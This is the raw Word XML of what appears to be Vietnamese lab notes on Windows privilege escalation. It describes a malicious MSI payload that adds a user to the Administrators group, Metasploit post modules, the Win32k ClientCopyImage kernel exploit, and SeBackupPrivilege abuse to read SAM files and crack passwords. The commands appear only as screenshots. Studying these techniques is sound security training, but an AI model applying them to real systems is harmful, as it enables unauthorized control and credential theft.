    <w:p w14:paraId="2CA8FBA7" w14:textId="3284E739" w:rsidR="00F445C0" w:rsidRDefault="00F445C0" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F445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59B3BB" wp14:editId="2150C43C">
            <wp:extent cx="4172532" cy="571580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="Picture 25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black background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3CBE" w14:textId="3273C73C" w:rsidR="00F445C0" w:rsidRDefault="00F445C0" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F445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03AEF7" wp14:editId="1B5BF933">
            <wp:extent cx="4029637" cy="381053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1AFF" w14:textId="4E0FBF7C" w:rsidR="00F445C0" w:rsidRDefault="00F445C0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ết quả: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D31D2C9" w14:textId="54185533" w:rsidR="00F445C0" w:rsidRDefault="00F445C0" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F445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BEB4C2" wp14:editId="5638977C">
            <wp:extent cx="5943600" cy="1079500"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="27" name="Picture 27" descr="A computer screen with number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omputer screen with numbers and arrow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679C" w14:textId="4C26524F" w:rsidR="00F445C0" w:rsidRDefault="00F445C0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ã được quyền AUTHORITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75308985" w14:textId="6218B7F0" w:rsidR="00D00E86" w:rsidRDefault="00D00E86" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DFA2D2D" w14:textId="050C448A" w:rsidR="00D00E86" w:rsidRDefault="00D00E86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Thêm người dùng vào Nhóm quản trị viên (Administration Group)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AE0AD2" w14:textId="09F3B0E4" w:rsidR="00E12794" w:rsidRDefault="00E12794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Kiểm tra user trên máy nạn nhân:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D5C22A" w14:textId="1B65E04A" w:rsidR="00E12794" w:rsidRDefault="00E12794" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E127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6D291" wp14:editId="636456E1">
            <wp:extent cx="5943600" cy="1427480"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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4110" w14:textId="4D451816" w:rsidR="00E12794" w:rsidRDefault="00E12794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Sử dụng User Tuan (Vẫn đang là quyền User):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD6D2C9" w14:textId="6EB9EE17" w:rsidR="00E12794" w:rsidRDefault="00E12794" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E127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3B8B32" wp14:editId="41579F42">
            <wp:extent cx="3915321" cy="4277322"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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C9FC" w14:textId="0A5E2FFE" w:rsidR="00E12794" w:rsidRDefault="00E12794" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A63CB35" w14:textId="615A699D" w:rsidR="00E12794" w:rsidRDefault="00E12794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ạo file 2.msi với payload window/exec, gửi lệnh hướng dẫn thêm đặc quyền quản trị viên cục bộ cho người dùng Tuan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6492A830" w14:textId="34E3EA74" w:rsidR="00572E42" w:rsidRDefault="00572E42" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572E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FF2077" wp14:editId="77814293">
            <wp:extent cx="5943600" cy="795020"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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3118" w14:textId="5C2F1176" w:rsidR="00572E42" w:rsidRDefault="00572E42" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572E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5BD920" wp14:editId="4D053780">
            <wp:extent cx="5943600" cy="3426460"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="31" name="Picture 3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omputer screen shot of a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C9DD" w14:textId="56E1DF9B" w:rsidR="00572E42" w:rsidRDefault="00572E42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Upload file 2.msi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324C14C0" w14:textId="01446EBC" w:rsidR="00572E42" w:rsidRDefault="00572E42" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572E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E3B14C" wp14:editId="3D159D68">
            <wp:extent cx="5268060" cy="590632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CE81" w14:textId="54C29C2B" w:rsidR="00572E42" w:rsidRDefault="00572E42" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572E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83A096" wp14:editId="4337F519">
            <wp:extent cx="5943600" cy="3070860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33" name="Picture 33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computer screen with a white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0087" w14:textId="65EA4D41" w:rsidR="00572E42" w:rsidRDefault="00572E42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Chạy file 2.msi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A29CE3" w14:textId="329A5D6F" w:rsidR="00572E42" w:rsidRDefault="00572E42" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572E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BA7FD0" wp14:editId="6BC6543B">
            <wp:extent cx="4048690" cy="40010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4ADB" w14:textId="413EDA39" w:rsidR="00572E42" w:rsidRDefault="00572E42" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572E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875A54" wp14:editId="2CA140C7">
            <wp:extent cx="4439270" cy="4172532"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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A4EF" w14:textId="6200C8F0" w:rsidR="00572E42" w:rsidRDefault="00572E42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User Tuan đã có quyền Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53297CD9" w14:textId="79A76C9E" w:rsidR="00572E42" w:rsidRDefault="00572E42" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FED6CC" w14:textId="408D70C1" w:rsidR="00572E42" w:rsidRDefault="00572E42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Khai thác thông qua </w:t>
      </w:r>
      <w:r w:rsidR="00446DE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit Post:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B7F19" w14:textId="35C197F5" w:rsidR="00446DE2" w:rsidRDefault="00D8597C" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D859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AF4046" wp14:editId="25D4704D">
            <wp:extent cx="5943600" cy="1122680"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="36" name="Picture 3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 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5EE1" w14:textId="19330B1C" w:rsidR="00D8597C" w:rsidRDefault="00D8597C" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D859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CFEEC6" wp14:editId="64407E1D">
            <wp:extent cx="5943600" cy="3982720"/>
            <wp:effectExtent l="0" t="0" r="0" b="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7722" w14:textId="26AB646A" w:rsidR="009E5AE3" w:rsidRDefault="00D8597C" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D859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92DF92" wp14:editId="1E00A188">
            <wp:extent cx="5943600" cy="1534160"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="38" name="Picture 38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computer screen with whit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00FD" w14:textId="3580FFB7" w:rsidR="009E5AE3" w:rsidRDefault="009E5AE3" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EFB9CF8" w14:textId="73E7C9EF" w:rsidR="00D8597C" w:rsidRPr="00287059" w:rsidRDefault="009E5AE3" w:rsidP="00500A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7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II. Windows Kernel Exploit Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3AB92E" w14:textId="591BD505" w:rsidR="0091428E" w:rsidRPr="0081753C" w:rsidRDefault="0091428E" w:rsidP="00500A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753C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. Windows-Exploit-suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC7F843" w14:textId="3C8B2831" w:rsidR="00CA1438" w:rsidRDefault="00CA1438" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA14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9C5363" wp14:editId="1D1B54A6">
            <wp:extent cx="5943600" cy="4330065"/>
            <wp:effectExtent l="0" t="0" r="0" b="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A902" w14:textId="710315D2" w:rsidR="00CA1438" w:rsidRDefault="00CA1438" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E68FC59" w14:textId="31616DBB" w:rsidR="00CA1438" w:rsidRPr="0081753C" w:rsidRDefault="00CA1438" w:rsidP="00500A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753C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Khai thác Windows ClientCopyImage Win32k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BB7422" w14:textId="624339B0" w:rsidR="00CA1438" w:rsidRDefault="00CA1438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Các lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidR="00137683">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>trong Windows Kernel-Mode Drives có thể cho phép nâng cao đặc quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4808F25F" w14:textId="5A556516" w:rsidR="00137683" w:rsidRDefault="00137683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Module này khai thác việc xử lý đối tượng không đúng cách trong trình điều khiển kernel win32k.sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1913D676" w14:textId="39DA832E" w:rsidR="00137683" w:rsidRDefault="00137683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Module này đã được thử nghiệm trên các phiên bản Windows 7 x64</w:t>
      </w:r>
      <w:r w:rsidR="00F306C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> và x86, Window 2008 R2 SP1 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE75448" w14:textId="56853368" w:rsidR="00F306C9" w:rsidRDefault="00F306C9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Khai thác: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F120229" w14:textId="506985F2" w:rsidR="00F306C9" w:rsidRDefault="00F306C9" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4463CF" w14:textId="4DEE8970" w:rsidR="00287059" w:rsidRPr="0081753C" w:rsidRDefault="00287059" w:rsidP="00500A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753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III. </w:t>
      </w:r>
      <w:r w:rsidR="002F150D" w:rsidRPr="0081753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eBackup Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28928E23" w14:textId="62952083" w:rsidR="00D8597C" w:rsidRDefault="00D7674C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SeBackupPrivilege được thiết kế để cho phép người dùng </w:t>
      </w:r>
      <w:r w:rsidR="00AD4C17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tạo bản sao lưu của hệ thống =&gt; Phải cấp quyền truy cập đọc đầy đủ vào hệ thống tệp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F880890" w14:textId="7F27D927" w:rsidR="00AD4C17" w:rsidRDefault="00AD4C17" w:rsidP="00AD4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+ Đặc quyền này phải bỏ qua mọi ACL mà Quản trị viên đã đặt trong mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C2BA1C" w14:textId="7A1DC591" w:rsidR="00AD4C17" w:rsidRDefault="00AD4C17" w:rsidP="00AD4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** ACL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633144AF" w14:textId="6D757CAF" w:rsidR="00AD4C17" w:rsidRDefault="00AD4C17" w:rsidP="00AD4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Đặc quyền này cho phép người dùng đọc bất kỳ file</w:t>
      </w:r>
      <w:r w:rsidR="001B50E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> nào trên toàn bộ tệp (SAM, System Registry file) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3D29E7" w14:textId="07B725B3" w:rsidR="001B50E2" w:rsidRDefault="001B50E2" w:rsidP="00AD4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Quy trình: sau khi truy cập được vào hệ thống =&gt; chuyển lên shell nâng cao bằng cách đọc tệp SAM </w:t>
      </w:r>
      <w:r w:rsidR="00501542">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt; bẻ khóa mật khẩu của người dùng đặc quyền cao trong hệ thống </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182E0764" w14:textId="51243363" w:rsidR="00074688" w:rsidRDefault="00074688" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D42D83" w14:textId="7FAB801A" w:rsidR="0081753C" w:rsidRPr="00D040D9" w:rsidRDefault="0081753C" w:rsidP="00AD4C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40D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>* Setting up Privilege on Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715E534A" w14:textId="112EEF5C" w:rsidR="00D040D9" w:rsidRDefault="00D040D9" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D040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14EC6" wp14:editId="5757DE2A">
            <wp:extent cx="5287113" cy="1133633"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="51" name="Picture 5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blue screen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CEFB" w14:textId="50EEB177" w:rsidR="00074688" w:rsidRDefault="00074688" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000746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2A6C4" wp14:editId="22949AD3">
            <wp:extent cx="5115639" cy="438211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F912" w14:textId="5011B60F" w:rsidR="0078331B" w:rsidRDefault="0078331B" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007833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D0061B" wp14:editId="048727E2">
            <wp:extent cx="2067213" cy="238158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36B0" w14:textId="09F37DFC" w:rsidR="0078331B" w:rsidRDefault="0078331B" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007833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56FD80" wp14:editId="30DF84B9">
            <wp:extent cx="5943600" cy="1088390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="44" name="Picture 44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blue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D8AE" w14:textId="0F214581" w:rsidR="0078331B" w:rsidRDefault="0078331B" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007833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DDB54" wp14:editId="5F7E6623">
            <wp:extent cx="5943600" cy="1694815"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="45" name="Picture 45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blue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11DA" w14:textId="097899D7" w:rsidR="0078331B" w:rsidRDefault="0078331B" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007833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60FD6B" wp14:editId="7EFB4AFC">
            <wp:extent cx="5943600" cy="952500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="46" name="Picture 4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 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7CFB" w14:textId="7A01C772" w:rsidR="0078331B" w:rsidRDefault="0078331B" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007833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1400CA" wp14:editId="228240EF">
            <wp:extent cx="5943600" cy="1172845"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="47" name="Picture 47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blue screen with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D95E" w14:textId="0B019C49" w:rsidR="00050A54" w:rsidRDefault="00050A54" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00050A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A9DF30" wp14:editId="27E4291A">
            <wp:extent cx="5706271" cy="562053"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="48" name="Picture 48" descr="A blue scree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blue screen with yellow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9400" w14:textId="3226ED95" w:rsidR="009E65F5" w:rsidRDefault="009E65F5" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E65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4FC037" wp14:editId="1710F02E">
            <wp:extent cx="5943600" cy="3531235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8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452C" w14:textId="1B449CD5" w:rsidR="009E65F5" w:rsidRDefault="009E65F5" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E65F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F31D53" wp14:editId="7AB8B6AA">
            <wp:extent cx="4382112" cy="4458322"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Picture 1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1A2" w14:textId="4E44E733" w:rsidR="009E65F5" w:rsidRDefault="009E65F5" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E65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4ADCA7" wp14:editId="402E60D0">
            <wp:extent cx="5943600" cy="1860550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="40" name="Picture 4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6EFC" w14:textId="27F07968" w:rsidR="009E65F5" w:rsidRDefault="009E65F5" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E65F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239170" wp14:editId="640ED439">
            <wp:extent cx="5943600" cy="2205355"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="41" name="Picture 4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computer screen shot of a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576F" w14:textId="47C47B23" w:rsidR="009E65F5" w:rsidRDefault="009E65F5" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E65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B4DA0F" wp14:editId="652527C4">
            <wp:extent cx="5943600" cy="5241290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/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764B" w14:textId="60F2E219" w:rsidR="009E65F5" w:rsidRDefault="009E65F5" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D8C80D" w14:textId="77777777" w:rsidR="00D040D9" w:rsidRPr="00AD4C17" w:rsidRDefault="00D040D9" w:rsidP="00AD4C17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71813E7F" w14:textId="7310524F" w:rsidR="00F445C0" w:rsidRDefault="00D040D9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Setting Up Privilege on Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54329CEE" w14:textId="34BB3698" w:rsidR="005121F9" w:rsidRDefault="005121F9" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D2A40C9" w14:textId="37F37CB5" w:rsidR="005121F9" w:rsidRPr="00CB0E3A" w:rsidRDefault="005121F9" w:rsidP="00500A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0E3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IV. Insecure GUI Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13041063" w14:textId="58F546A4" w:rsidR="005121F9" w:rsidRDefault="00840484" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008404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99D736" wp14:editId="4DB5F7EE">
            <wp:extent cx="5943600" cy="3179445"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="49" name="Picture 4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F1F8" w14:textId="13242867" w:rsidR="00840484" w:rsidRDefault="00840484" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008404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A4E1B7" wp14:editId="5C21AE2F">
            <wp:extent cx="5943600" cy="4587240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="5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BD66" w14:textId="5AF85BB5" w:rsidR="00840484" w:rsidRDefault="00840484" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008404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446A65" wp14:editId="354609F2">
            <wp:extent cx="5943600" cy="4050665"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="52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23F2" w14:textId="563A7E43" w:rsidR="00840484" w:rsidRDefault="00840484" w:rsidP="00500A9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
